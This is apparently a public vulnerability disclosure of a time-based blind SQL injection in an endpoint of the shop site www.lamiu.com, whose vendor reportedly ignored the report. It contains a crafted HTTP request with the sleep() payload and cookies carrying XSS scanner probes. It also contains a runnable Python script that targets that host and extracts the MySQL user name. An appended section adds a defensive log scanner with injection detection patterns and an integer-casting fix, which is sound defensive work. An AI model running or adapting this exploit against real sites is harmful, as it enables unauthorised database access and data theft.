2016-01-17: Details have been reported to the vendor and are awaiting vendor handling. 2016-01-22: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
POST /index.php/product-getAdjunctPro.html?ijfitnfo HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.lamiu.com/
Cookie: vary=static6dcd7865027f12ffefb2873dc41498a4; s=0da89b7ebdf6f1bcb64c1abeb4e286e1; S[SIGN][REMEMBER]=1; S[CART_COUNT]=131; S[CART_NUMBER]=315; S[CART_TOTAL_PRICE]=%EF%BF%A529889.00; cart[go_back_link]=http%3A%2F%2Fwww.lamiu.com%2F; S[GALLERY][FILTER]=cat_id%3D147%26virtual_cat_id%3D9%26virtual_cat_id%3D9%26p_1%5B%5D%3D286%26p_1%5B%5D%3D287%26p_1%5B%5D%3D288%26p_1%5B%5D%3D289%26p_1%5B%5D%3D290%26p_1%5B%5D%3D291%26p_3%5B%5D%3D304%26p_3%5B%5D%3D305%26p_3%5B%5D%3D306%26p_3%5B%5D%3D307%26p_6%5B%5D%3D324%26p_6%5B%5D%3D325%26p_6%5B%5D%3D326%26p_6%5B%5D%3D327%26p_7%5B%5D%3D328%26p_7%5B%5D%3D329%26p_7%5B%5D%3D330%26p_7%5B%5D%3D331%26p_8%5B%5D%3D333%26p_8%5B%5D%3D334%26p_8%5B%5D%3D335%26p_8%5B%5D%3D336%26p_9%5B%5D%3D337%26p_9%5B%5D%3D338%26p_9%5B%5D%3D339%26p_10%5B%5D%3D340%26p_10%5B%5D%3D341%26p_10%5B%5D%3D342%26p_13%5B%5D%3D355%26p_13%5B%5D%3D356%26s_5%5B%5D%3D93%26s_5%5B%5D%3D161%26s_5%5B%5D%3D100%26s_5%5B%5D%3D134%26s_5%5B%5D%3D115%26s_5%5B%5D%3D96%26s_5%5B%5D%3D164%26s_5%5B%5D%3D104%26s_5%5B%5D%3D136%26s_5%5B%5D%3D102%26s_5%5B%5D%3D109%26s_5%5B%5D%3D92%26s_5%5B%5D%3D94%26s_5%5B%5D%3D95%26s_5%5B%5D%3D98%26s_5%5B%5D%3D99%26s_5%5B%5D%3D101%26s_5%5B%5D%3D103%26s_5%5B%5D%3D105%26s_5%5B%5D%3D106%26s_5%5B%5D%3D107%26s_5%5B%5D%3D108%26s_5%5B%5D%3D110%26s_5%5B%5D%3D111%26s_5%5B%5D%3D112%26s_5%5B%5D%3D113%26s_5%5B%5D%3D114%26s_5%5B%5D%3D116%26s_5%5B%5D%3D117%26s_5%5B%5D%3D118%26s_5%5B%5D%3D119%26s_5%5B%5D%3D120%26s_5%5B%5D%3D121%26s_5%5B%5D%3D122%26s_5%5B%5D%3D123%26s_5%5B%5D%3D124%26s_5%5B%5D%3D125%26s_5%5B%5D%3D126%26s_5%5B%5D%3D127%26s_5%5B%5D%3D128%26s_5%5B%5D%3D129%26s_5%5B%5D%3D130%26s_5%5B%5D%3D131%26s_5%5B%5D%3D132%26s_5%5B%5D%3D133%26s_5%5B%5D%3D135%26s_5%5B%5D%3D137%26s_5%5B%5D%3D138%26s_5%5B%5D%3D139%26s_5%5B%5D%3D140%26s_5%5B%5D%3D141%26s_5%5B%5D%3D142%26s_5%5B%5D%3D143%26s_5%5B%5D%3D144%26s_5%5B%5D%3D145%26s_5%5B%5D%3D146%26s_5%5B%5D%3D147%26s_5%5B%5D%3D148%26s_5%5B%5D%3D149%26s_5%5B%5D%3D150%26s_5%5B%5D%3D151%26s_5%5B%5D%3D152%26s_5%5B%5D%3D153%26s_5%5B%5D%3D154%26s_5%5B%5D%3D155%26s_5%5B%5D%3D156%26s_5%5B%5D%3D157%26s_5%5B%5D%3D158%26s_5%5B%5D%3D159%26s_5%5B%5D%3D160%26s_5%5B%5D%3D162%26s_5%5B%5D%3D163%26s_5%5B%5D%3D165%26s_5%5B%5D%3D166%26s_5%5B%5D%3D167%26s_5%5B%5D%3D168%26s_5%5B%5D%3D169%26s_5%5B%5D%3D170%26s_5%5B%5D%3D171%26s_5%5B%5D%3D172%26s_5%5B%5D%3D173%26s_5%5B%5D%3D174%26s_5%5B%5D%3D175%26s_5%5B%5D%3D176%26s_5%5B%5D%3D177%26s_5%5B%5D%3D178%26s_5%5B%5D%3D179%26s_5%5B%5D%3D180%26s_5%5B%5D%3D181%26s_5%5B%5D%3D182%26s_5%5B%5D%3D183%26s_5%5B%5D%3D184%26s_5%5B%5D%3D185%26s_5%5B%5D%3D186%26s_5%5B%5D%3D187%26s_5%5B%5D%3D188%26s_5%5B%5D%3D189%26s_5%5B%5D%3D190%26s_5%5B%5D%3D191%26s_5%5B%5D%3D192%26s_5%5B%5D%3D193%26s_5%5B%5D%3D194%26s_5%5B%5D%3D195%26s_5%5B%5D%3D196%26s_5%5B%5D%3D197%26s_5%5B%5D%3D198%26s_5%5B%5D%3D199%26s_5%5B%5D%3D200%26orderBy%3D%26showtype%3Dgrid%26; S[SEARCH_KEY]=%BE%DB%C2%A3; S[FIRST_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850458000%7D; S[NOW_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850475000%7D; S[N]=AE592E85-E439-5248-EDC3-26450F7541C5; Hm_lvt_35dfb17676caeb2ba818819534646912=1452852660,1452852863,1452852941,1452852941; Hm_lpvt_35dfb17676caeb2ba818819534646912=1452852941; HMACCOUNT=84BCA4D31DF03561; S[BRAND][FILTER]=brand_id%5B%5D%3D15%26orderBy%3Dprice%20desc%26showtype%3Dgrid%26page%3D1
Host: www.lamiu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

goods_id=5255&p_goods_id=if(now()=sysdate(),sleep(if(length(user())=24,3,0)),0)
The length of user() is 24.
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded'}
# Candidate characters for each position of the MySQL user() string.
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print '[%s] Start to retrieve MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
# user() was found to be 24 characters long, so probe positions 1..24.
for i in range(1, 25):
    for payload in payloads:
        # Time-based blind condition: the server sleeps 5 s only when the
        # character at position i equals the candidate; otherwise it returns at once.
        s = "if(now()=sysdate(),sleep(if(ascii(substr(user(),%s,1))=%s,5,0)),0)" % (i, ord(payload))
        s = "goods_id=5255&p_goods_id=" + s
        conn = httplib.HTTPConnection('www.lamiu.com', timeout=90)
        start_time = time.time()
        conn.request('POST', '/index.php/product-getAdjunctPro.html?ijfitnfo', s, headers)
        h = conn.getresponse().read()
        conn.close()
        print '.',
        #print time.time() - start_time
        # A response slower than 5 s means the sleep() branch ran: the guess was right.
        if time.time() - start_time > 5.0:
            user += payload
            print '\n\n[in progress]', user,
            break
print '\n[Done] MySQL user is %s' % user
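Added example (not from the original report or the vendor's code): defender-side detection of the time-based blind injection pattern shown above, run over a constructed, simplified access log. It combines an integer-only allow-list for the endpoint's id parameters (assumed from the request), MySQL timing-signature matching after URL decoding, and response-time corroboration; the 2 s slow-response threshold is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed sample log (not from the report): timestamp, method, path,
# response time in ms, URL-encoded POST body ("-" when there is none).
SAMPLE_LOG = """\
2016-01-17T10:01:02 POST /index.php/product-getAdjunctPro.html 118 goods_id=5255&p_goods_id=5263
2016-01-17T10:01:05 POST /index.php/product-getAdjunctPro.html 3042 goods_id=5255&p_goods_id=if(now()=sysdate(),sleep(if(length(user())=24,3,0)),0)
2016-01-17T10:01:11 POST /index.php/product-getAdjunctPro.html 5107 goods_id=5255&p_goods_id=if%28now%28%29%3Dsysdate%28%29%2Csleep%28if%28ascii%28substr%28user%28%29%2C1%2C1%29%29%3D114%2C5%2C0%29%29%2C0%29
2016-01-17T10:01:12 GET /index.php/product-5255.html 91 -
"""

# Parameters this endpoint should only receive as plain integers (assumed from
# the request in the report); this allow-list catches what signatures miss.
INTEGER_PARAMS = {"goods_id", "p_goods_id"}

# MySQL time-based blind injection signatures, matched after URL decoding.
SIGNATURES = {
    "sleep_call": re.compile(r"\bsleep\s*\(", re.I),
    "now_eq_sysdate": re.compile(r"\bnow\s*\(\s*\)\s*=\s*sysdate\s*\(", re.I),
    "user_probe": re.compile(r"\b(?:length|ascii|substr|substring)\s*\(\s*user\s*\(", re.I),
}
SLOW_MS = 2000  # a flagged request slower than this corroborates a sleep()

def parse_line(line):
    """Split one log line into fields; body parameters are URL-decoded twice."""
    ts, method, path, ms, body = line.split(" ", 4)
    params = dict(parse_qsl(body, keep_blank_values=True)) if body != "-" else {}
    # parse_qsl decodes once; decode again so double-encoded payloads are seen.
    params = {k: unquote_plus(v) for k, v in params.items()}
    return {"ts": ts, "method": method, "path": path, "ms": int(ms), "params": params}

def analyze(line):
    """Return the findings for one log line (empty list when it looks clean)."""
    rec = parse_line(line)
    findings = []
    for name, value in rec["params"].items():
        if name in INTEGER_PARAMS and not value.isdigit():
            findings.append("non_integer:%s" % name)
        findings += ["%s:%s" % (sig, name) for sig, rx in SIGNATURES.items() if rx.search(value)]
    # Timing corroboration only matters once the content check has fired.
    if findings and rec["ms"] >= SLOW_MS:
        findings.append("slow_response:%dms" % rec["ms"])
    return findings

def scan(log_text):
    """Map the timestamp of every suspicious line to its findings."""
    return {parse_line(l)["ts"]: f for l in log_text.splitlines() if (f := analyze(l))}
```

The server-side fix is the same allow-list applied before the query is built (cast the ids to integers, or bind them as integer parameters in a prepared statement); the log scan only tells you when that was missing.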
Severity: No impact (vendor ignored)
Ignored on: 2016-01-22 12:30
Vulnerability Rank: 4 (WooYun rating)
None yet